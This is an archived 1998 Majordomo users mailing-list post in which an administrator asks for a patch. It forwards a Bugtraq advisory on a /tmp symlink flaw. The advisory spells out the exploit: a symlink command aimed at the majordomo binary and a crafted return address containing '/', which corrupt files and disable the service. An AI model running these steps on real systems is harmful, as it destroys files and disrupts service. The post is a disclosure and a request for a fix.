Great Circle Associates Majordomo-Users
(June 1998)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: Request for Patch Help ??? again...:(
From: "Bernard A. Carpenter" <carpentb @ usdoj . gov>
Date: Mon, 22 Jun 1998 09:28:18 -0400 (EDT)
To: majordomo-users @ GreatCircle . com



Everyone,

    I have just put up Majordomo successfully but before I release it out
to our users I want to find a fix to this problem that came in off this
cert, concerning majordomo checking for any unauthorized synlinks... :...

--------- Forwarded message ----------
Date: Thu, 26 Mar 1998 15:03:28 -0600
From: Karl G - NOC Admin <ovrneith@tqgnet.com>
To: BUGTRAQ@NETSPACE.ORG
Subject: Majordomo /tmp exploit

-=desc=-
Majordomo allows appending to any file owned by the majordomo user/group.

-=x-ploit=-
create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug

send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/1234@yourdomain.com

the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable.  (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at
all.
--snip--
Subject: MAJORDOMO ABORT (mj_majordomo)
-
MAJORDOMO ABORT (mj_majordomo)!!

HOSTILE ADDRESS (no x400 c=) blah/34234@domain.com
--snip--

-=fix=-
should the wrapper not check for such things?
  



Indexed By Date Previous: Re: From/Reply-to header help...
From: Richard Welty <rwelty@neworks.net>
Next: Re: how do i put listname in the from: clause of any outgoing messages?
From: Rich Pieri <rich.pieri@prescienttech.com>
Indexed By Thread Previous: Request for Patch guideance...
From: "Bernard A. Carpenter" <carpentb@usdoj.gov>
Next: set up first list?
From: "Kyle and Jennifer Hodgson" <hodgson@king.igs.net>

Google
 
Search Internet Search www.greatcircle.com